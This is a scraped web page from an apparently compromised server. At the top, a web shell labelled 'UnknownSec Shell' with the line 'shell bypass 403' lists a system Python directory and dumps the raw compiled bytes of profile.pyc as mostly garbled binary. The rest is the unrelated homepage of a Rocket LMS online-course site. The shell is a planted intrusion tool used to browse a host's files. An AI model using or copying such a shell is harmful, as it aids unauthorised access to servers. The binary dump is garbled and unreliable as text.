shell bypass 403

UnknownSec Shell

: /lib64/python2.7/ [ drwxr-xr-x ]

name : profile.pyc
�
zfc@s$dZddlZddlZddlZddlZddlmZddddgZedd�Z	edd	�Z
d
�Zeed�r�ej
d�Znd
Zy+ddlZd�Zed�ZdZWnek
r�nXdfd��YZd�Zd�Zedkr e�ndS(s Class for profiling Python code.i����N(tOptionParsertruntrunctxthelptProfilecCs]t�}y|j|�}Wntk
r/nX|dk	rL|j|�n
|j|�SdS(sRun statement under profiler optionally saving results in filename

    This function takes a single argument that can be passed to the
    "exec" statement, and an optional file name.  In all cases this
    routine attempts to "exec" its first argument and gather profiling
    statistics from the execution. If no file name is present, then this
    function automatically prints a simple profiling report, sorted by the
    standard name string (file/line/function-name) that is presented in
    each line.
    N(RRt
SystemExittNonet
dump_statstprint_stats(t	statementtfilenametsorttprof((s/usr/lib64/python2.7/profile.pyR0s	
cCsct�}y|j|||�}Wntk
r5nX|dk	rR|j|�n
|j|�SdS(s�Run statement under profiler, supplying your own globals and locals,
    optionally saving results in filename.

    statement and filename have the same semantics as profile.run
    N(RRRRRR(R	tglobalstlocalsR
RR((s/usr/lib64/python2.7/profile.pyREs	
cCsdGHdGHdS(Ns2Documentation for the profile module can be found s?in the Python Library Reference, section 'The Python Profiler'.((((s/usr/lib64/python2.7/profile.pyRWsttimescCs|�}|d|dS(Nii((ttimertt((s/usr/lib64/python2.7/profile.pyt_get_time_times\s	icCstjtj�S(N(tresourcet	getrusagetRUSAGE_SELF(((s/usr/lib64/python2.7/profile.pyt<lambda>gtcCs|�}|d|dS(Nii((RR((s/usr/lib64/python2.7/profile.pyt_get_time_resourcehs	icBs3eZdZdZd"d"d�Zd�Zd�Zd�Zd�Z	d�Z
d�Zd	�Zd
�Z
ied6e
d6e
d
6ed6e
d6e
d6Zd�Zdd#d��YZdd$d��YZd�Zd�Zdd�Zd�Zd�Zd�Zd�Zd�Zd�Zdd �Zd!�ZRS(%sProfiler class.

    self.cur is always a tuple.  Each such tuple corresponds to a stack
    frame that is currently active (self.cur[-2]).  The following are the
    definitions of its members.  We use this external "parallel stack" to
    avoid contaminating the program that we are profiling. (old profiler
    used to write into the frames local dictionary!!) Derived classes
    can change the definition of some entries, as long as they leave
    [-2:] intact (frame and previous tuple).  In case an internal error is
    detected, the -3 element is used as the function name.

    [ 0] = Time that needs to be charged to the parent frame's function.
           It is used so that a function call will not have to access the
           timing data for the parent frame.
    [ 1] = Total time spent in this frame's function, excluding time in
           subfunctions (this latter is tallied in cur[2]).
    [ 2] = Total time spent in subfunctions, excluding time executing the
           frame's function (this latter is tallied in cur[1]).
    [-3] = Name of the function that corresponds to this frame.
    [-2] = Actual frame that we correspond to (used to sync exception handling).
    [-1] = Our parent 6-tuple (corresponds to frame.f_back).

    Timing data for each function is stored as a 5-tuple in the dictionary
    self.timings[].  The index is always the name stored in self.cur[-3].
    The following are the definitions of the members:

    [0] = The number of times this function was called, not counting direct
          or indirect recursion,
    [1] = Number of times this function appears on the stack, minus one
    [2] = Total time spent internal to this function
    [3] = Cumulative time that this function was present on the stack.  In
          non-recursive functions, this is the total execution time from start
          to finish of each invocation of a function, including time spent in
          all subfunctions.
    [4] = A dictionary indicating for each function name, the number of times
          it was called by us.
    icCs�i|_d|_d|_d|_|dkr<|j}n||_|s�trrt|_|j	|_
t|_q�t
td�r�tj|_|_|j|_
q�t
td�r�tj|_|j	|_
t|_q�tj|_|_|j|_
n�||_|j�}yt|�}Wn&tk
rE||_|j|_
n@X|dkra|j	|_
n|j|_
|td�}||_|j�|_|jd�dS(NRtclockRicSs
||��S(N((Rtsum((s/usr/lib64/python2.7/profile.pytget_time_timer�stprofiler(ttimingsRtcurtcmdtc_func_nametbiast_has_restresgetrusageRttrace_dispatcht
dispatcherRtget_timethasattrttimeRttrace_dispatch_itosRRtlent	TypeErrorttrace_dispatch_lRRt
simulate_call(tselfRR!RtlengthR((s/usr/lib64/python2.7/profile.pyt__init__�sF							
		cCs�|j}|�}|d|d|j|j}|dkrM|j|_n|j||||�r�|�}|d|d|_n"|�}|d|d||_dS(Niitc_call(RRR!t__name__R tdispatch(R/tframeteventtargRRtr((s/usr/lib64/python2.7/profile.pyR$�s		 		cCsw|j}|�|j|j}|dkr;|j|_n|j||||�rc|�|_n|�||_dS(NR2(RRR!R3R R4(R/R5R6R7RR((s/usr/lib64/python2.7/profile.pyR)�s	cCs�|j}|�d|j|j}|dkr?|j|_n|j||||�rk|�d|_n|�d||_dS(NgN@R2(RRR!R3R R4(R/R5R6R7RR((s/usr/lib64/python2.7/profile.pyttrace_dispatch_mac�s	cCsw|j}|�|j|j}|dkr;|j|_n|j||||�rc|�|_n|�||_dS(NR2(R&RR!R3R R4(R/R5R6R7R&R((s/usr/lib64/python2.7/profile.pyR-�s	c	Cs`|j\}}}}}}||k	r=|r=|j||�S|||||||f|_dS(Ni(Rttrace_dispatch_return(	R/R5Rtrpttrittrettrfntrframetrcur((s/usr/lib64/python2.7/profile.pyttrace_dispatch_exception
s
cCs�|jr�|j|jdk	r�|j\}}}}}}t|tj�s�|j|jks�td|||j||jf��|j|d�|jdks�|j|jdks�td|jdf��q�n|j}	|	j	|	j
|	jf}
|dd|
||jf|_|j}|
|krc||
\}}
}}}||
d|||f||
<nddddif||
<dS(Ni����sBad callii����i(
Rtf_backt
isinstanceRt
fake_frametAssertionErrorR:Rtf_codetco_filenametco_firstlinenotco_nameR(R/R5RR;R<R=R>R?R@tfcodetfnRtcctnsttttcttcallers((s/usr/lib64/python2.7/profile.pyttrace_dispatch_calls&			 c
Cs�dd|jf}|dd|||jf|_|j}||kr~||\}}}}}	||d|||	f||<nddddif||<dS(NRii(R RR(
R/R5RRKRRLRMRNRORP((s/usr/lib64/python2.7/profile.pyttrace_dispatch_c_call+s	 cCsU||jdk	r\||jdjksBtd|jdf��|j|jdd�n|j\}}}}}}||}||}|\}	}
}}}
}|	|
|||||
|f|_|j}||\}}}}}|s||}|d}n||kr&||d||<n
d||<||d||||f||<dS(Ni����s
Bad returni����ii(RRBRER:R(R/R5RR;R<R=R>R@tframe_totaltppttpittpettpfntpframetpcurRRLRMRNRORP((s/usr/lib64/python2.7/profile.pyR:6s$/

#	


!tcallt	exceptiontreturnR2tc_exceptiontc_returncCs+|jdrdS||_|j|�dS(Ni����(RRR.(R/R((s/usr/lib64/python2.7/profile.pytset_cmdls
	t	fake_codecBseZd�Zd�ZRS(cCs(||_||_||_d|_dS(Ni(RGtco_lineRIRH(R/R
tlinetname((s/usr/lib64/python2.7/profile.pyR1rs			cCst|j|j|jf�S(N(treprRGRaRI(R/((s/usr/lib64/python2.7/profile.pyt__repr__xs(R3t
__module__R1Re(((s/usr/lib64/python2.7/profile.pyR`qs	RDcBseZd�ZRS(cCs||_||_dS(N(RFRB(R/tcodetprior((s/usr/lib64/python2.7/profile.pyR1|s	(R3RfR1(((s/usr/lib64/python2.7/profile.pyRD{scCsa|jdd|�}|jr.|jd}nd}|j||�}|jd||d�dS(Ntprofileii����RZ(R`RRRDR4(R/RcRgRXR5((s/usr/lib64/python2.7/profile.pyR.�s	cCse|j}|�|j}x5|jdrP|jd||jd|�d}qW|�||_dS(Ni����R\i����i(R&RRR4(R/R&R((s/usr/lib64/python2.7/profile.pytsimulate_cmd_complete�s	
i����cCs2ddl}|j|�j�j|�j�dS(Ni����(tpstatstStatst
strip_dirst
sort_statsR(R/RRk((s/usr/lib64/python2.7/profile.pyR�scCs:t|d�}|j�tj|j|�|j�dS(Ntwb(topentcreate_statstmarshaltdumptstatstclose(R/tfiletf((s/usr/lib64/python2.7/profile.pyR�s
cCs|j�|j�dS(N(Rjtsnapshot_stats(R/((s/usr/lib64/python2.7/profile.pyRq�s
c	Cs�i|_x{|jj�D]j\}\}}}}}|j�}d}x|j�D]}||7}qSW|||||f|j|<qWdS(Ni(RtRt	iteritemstcopyt
itervalues(	R/tfuncRLRMRNRORPtnctcallcnt((s/usr/lib64/python2.7/profile.pyRx�s	+cCs(ddl}|j}|j|||�S(Ni����(t__main__t__dict__R(R/RRtdict((s/usr/lib64/python2.7/profile.pyR�s	cBs@|j|�ej|j�z|||UWdejd�X|S(N(R_tsyst
setprofileR%R(R/RR
R((s/usr/lib64/python2.7/profile.pyR�s
cOsI|jt|��tj|j�z|||�SWdtjd�XdS(N(R_RdR�R�R%R(R/R|targstkw((s/usr/lib64/python2.7/profile.pytruncall�s
cCsU|jtk	rtd��n|j}d|_z|j||�SWd||_XdS(Ns&Subclasses must override .calibrate().i(t	__class__RR,R!t_calibrate_inner(R/tmtverboset
saved_bias((s/usr/lib64/python2.7/profile.pyt	calibrate�s		cCs}|j}d�}|d�}||�|�}||�|�}||}|r`dG|GHnt�}	|�}|	jdt�t��|�}||}
|r�dG|
GHnd}d}xX|	jj�D]G\\}
}}\}}}}}|dkr�||7}||7}q�q�W|r2d	G|GHd
G|GHn||dkrUtd|��n||d
|}|rydG|GHn|S(NcSs!xt|�D]}d}q
WdS(Ni(trange(tntitx((s/usr/lib64/python2.7/profile.pytf1scSs%xt|�D]}|d�q
WdS(Nid(R�(R�R�R�((s/usr/lib64/python2.7/profile.pyRwss elapsed time without profiling =sf(m)selapsed time with profiling =gRwR�s!'CPU seconds' profiler reported =stotal # calls =is internal error: total calls = %dg@s+mean stopwatch overhead per profile event =(RwR�(R&RRR
RRtitemst
ValueError(R/R�R�R&R�Rwtt0tt1telapsed_noprofiletptelapsed_profilettotal_callst
reported_timeR
RbtfuncnameRLRMRNRORPtmean((s/usr/lib64/python2.7/profile.pyR��sB		
	
	
			
1
	N(((R3Rft__doc__R!RR1R$R)R9R-RARQRRR:R4R_R`RDR.RjRRRqRxRRR�R�R�(((s/usr/lib64/python2.7/profile.pyRos@%3								&

	
					
		
	1cGs	dGHdS(Ns7Report generating functions are in the "pstats" module((R�((s/usr/lib64/python2.7/profile.pyRl=sc	CsXd}td|�}t|_|jddddddd	d�|jd
ddddd
d	d�tjds�|j�tjd�n|j	�\}}|tj(t
|�dkrJ|d}tjjdt
jj|��t|d��}t|j�|d�}WdQXi|d6dd6dd6}t||d|j|j�n
|j�|S(Ns?profile.py [-o output_file_path] [-s sort] scriptfile [arg] ...tusages-os	--outfiletdesttoutfileRsSave stats to <outfile>tdefaults-ss--sortRs?Sort order when printing to stdout, based on pstats.Stats classi����iiitrbtexect__file__RR3t__package__(RtFalsetallow_interspersed_argst
add_optionRR�targvtprint_usagetexitt
parse_argsR+tpathtinsertR*tdirnameRptcompiletreadRR�R(R�tparsertoptionsR�tprognametfpRgtglobs((s/usr/lib64/python2.7/profile.pytmain@s2	






R(R�R�R*R(RrtoptparseRt__all__RRRRR'RRR"RR#RtImportErrorRRlR�R3(((s/usr/lib64/python2.7/profile.pyt<module>	s2		

��		!

© 2025 UnknownSec
Learning made Easy | Anyleson - Learning Platform
INR (₹)
India Rupee
$
United States Dollar

Joy of learning & teaching...

Rocket LMS is a fully-featured educational platform that helps instructors to create and publish video courses, live classes, and text courses and earn money, and helps students to learn in the easiest way.

6

Skillful Instructors

Start learning from experienced instructors.

11

Happy Students

Enrolled in our courses and improved their skills.

8

Live Classes

Improve your skills using live knowledge flow.

10

Video Courses

Learn without any geographical & time limitations.

Featured Courses

#Browse featured courses and become skillful

New Learning Page

Learn step-by-step tips that help you get things done with your virtual team by increasing trust and accountability.If you manage a virtual team today, then you'll probably continue to do so for the rest of your career.

5.00
20% Offer

Excel from Beginner to Advanced

Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS. It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications (VBA).

4.75

Newest Courses

#Recently published courses

View All
Course
Full Stack Web Development

Full Stack Web Development

in Web Development
83:20 Hours
10 Oct 2024
₹28,318.82
Course
Installment and Secure Host

Installment and Secure Host

in Business Strategy
5.00
1:30 Hours
16 Mar 2023
₹118
Not conducted
Bestseller
New In-App Live System

New In-App Live System

in Communications
5.00
2:30 Hours
1 Mar 2026
₹11.80
Featured
New Learning Page

New Learning Page

in Lifestyle
5.00
3:30 Hours
1 Mar 2022
Free
Finished
Effective Time Management

Effective Time Management

in Management
5.00
1:30 Hours
1 Aug 2023
₹35.40
20% Offer
Excel from Beginner to Advanced

Excel from Beginner to Advanced

in Management
4.75
1:40 Hours
20 Mar 2026
₹94.40 ₹118

Latest bundles

Latest bundles subtitle

View All
Bestseller
Microsoft Office Beginner to Expert Bundle

Microsoft Office Beginner to Expert Bundle

in Management
5.00
15:10 Hours
24 Jun 2022
₹59

A-Z Web Programming

in Web Development
4.75
2:20 Hours
25 Jun 2022
₹9.44

Upcoming Courses

Courses that will be published soon

View All

Best Rated Courses

#Enjoy high quality and best rated content

View All
Finished
Effective Time Management

Effective Time Management

in Management
5.00
1:30 Hours
1 Aug 2023
₹35.40
20% Offer
Health And Fitness Masterclass

Health And Fitness Masterclass

in Health & Fitness
5.00
1:00 Hours
1 Jul 2021
₹18.88 ₹23.60
Finished
Learn Linux in 5 Days

Learn Linux in 5 Days

in Web Development
4.69
7:30 Hours
10 Jul 2021
Free
Text course
Learn Python Programming

Learn Python Programming

in Web Development
4.63
0:35 Hours
29 Jun 2021
Free
Course
Become a Product Manager

Become a Product Manager

in Business Strategy
4.58
2:30 Hours
28 Jun 2021
Free
20% Offer
Learn and Understand AngularJS

Learn and Understand AngularJS

in Web Development
3.88
1:00 Hours
10 Dec 2023
₹18.88 ₹23.60

Trending Categories

#Browse trending & popular learning topics

Bestselling Courses

#Learn from bestselling courses

View All
Course
Become a Product Manager

Become a Product Manager

in Business Strategy
4.58
2:30 Hours
28 Jun 2021
Free
Finished
Learn Linux in 5 Days

Learn Linux in 5 Days

in Web Development
4.00
7:30 Hours
10 Jul 2021
Free
20% Offer
Excel from Beginner to Advanced

Excel from Beginner to Advanced

in Management
4.75
1:40 Hours
20 Mar 2026
₹94.40 ₹118
Finished
Effective Time Management

Effective Time Management

in Management
5.00
1:30 Hours
1 Aug 2023
₹35.40
Featured
New Learning Page

New Learning Page

in Lifestyle
5.00
3:30 Hours
1 Mar 2022
Free
Not conducted
Bestseller
New In-App Live System

New In-App Live System

in Communications
5.00
2:30 Hours
1 Mar 2026
₹11.80

Free Courses

#Never miss free learning opportunities

View All
Featured
New Learning Page

New Learning Page

in Lifestyle
5.00
3:30 Hours
1 Mar 2022
Free
Course
New Update Features

New Update Features

in Language
4.00
1:30 Hours
21 Jun 2022
Free
Text course
Learn Python Programming

Learn Python Programming

in Web Development
5.00
0:35 Hours
29 Jun 2021
Free
Finished
Learn Linux in 5 Days

Learn Linux in 5 Days

in Web Development
4.00
7:30 Hours
10 Jul 2021
Free
Course
Become a Product Manager

Become a Product Manager

in Business Strategy
4.58
2:30 Hours
28 Jun 2021
Free

Discounted Courses

#Get courses at the latest price

View All
20% Offer
Excel from Beginner to Advanced

Excel from Beginner to Advanced

in Management
4.75
1:40 Hours
20 Mar 2026
₹94.40 ₹118
20% Offer
Learn and Understand AngularJS

Learn and Understand AngularJS

in Web Development
2.75
1:00 Hours
10 Dec 2023
₹18.88 ₹23.60
20% Offer
Health And Fitness Masterclass

Health And Fitness Masterclass

in Health & Fitness
5.00
1:00 Hours
1 Jul 2021
₹18.88 ₹23.60
40% Offer
The Future of Energy

The Future of Energy

in Science
2.50
1:10 Hours
8 Jul 2021
₹42.48 ₹70.80

Store Products

Explore physical & virtual products

All Products

Subscribe Now!

#Choose a subscription plan and save money!

Become an instructor

Are you interested to be a part of our community? You can be a part of our community by signing up as an instructor or organization.

Become an instructor circle dots
user name
Become an instructor start earning right now...
Have a Question? Ask it in forum and get answer circle dots

Have a Question? Ask it in forum and get answer

Our forums helps you to create your questions on different subjects and communicate with other forum users. Our users will help you to get the best answer!

Find the best instructor

Looking for an instructor? Find the best instructors according to different parameters like gender, skill level, price, meeting type, rating, etc. Find instructors on the map.

Find the best instructor circle dots
user name
Tutor Finder Find the best instructor now...

Start learning anywhere, anytime...

Use Rocket LMS to access high-quality education materials without any limitations in the easiest way.

Win Club Points
medal
You earned 50 points! for completing the course...

Win Club Points

Use Rocket LMS and win club points according to different activities. You will be able to use your club points to get free prizes and courses. Start using the system now and collect points!

Instructors

#Learn from the experienced & skillful instructors

All Instructors

Testimonials

#What our customers say about us

Ryan Newman

Ryan Newman

Data Analyst at Microsoft

"We've used Rocket LMS for the last 2  years. Thanks for the great service."

Megan Hayward

Megan Hayward

System Administrator at Amazon

"We're loving it. Rocket LMS is both perfect    and highly adaptable."

Natasha Hope

Natasha Hope

IT Technician at IBM

"I am really satisfied with my Rocket LMS. It's the perfect solution for our business."

Charles Dale

Charles Dale

Computer Engineer at Oracle

"I am so pleased with this product. I couldn't have asked for more than this."

David Patterson

David Patterson

Network Technician at Cisco

"Rocket LMS impressed me on multiple           levels."

Organizations

#Greatest education organizations are here to help you

All Organizations

Blog

#Explore latest news and articles

Blog Posts
Become a Straight-A Student 1 Jul 2021

Become a Straight-A Student

In this article, I’ll explain the two rules I followed to become a straight-A student. If you take my advice, you’ll get better grades and lead a more ...
How To Teach Your Kid Easily 1 Jul 2021

How To Teach Your Kid Easily

The primary reason kids struggle with school is fear. And in most cases, it’s their parent's fault. I started tutoring math out of financial desperation. ...
Better Relationship Between Friends 1 Jul 2021

Better Relationship Between Friends

The tutor-parent relationship is an important relationship and unfortunately greatly overlooked. Why is it important? Well, a good relationship between you and ...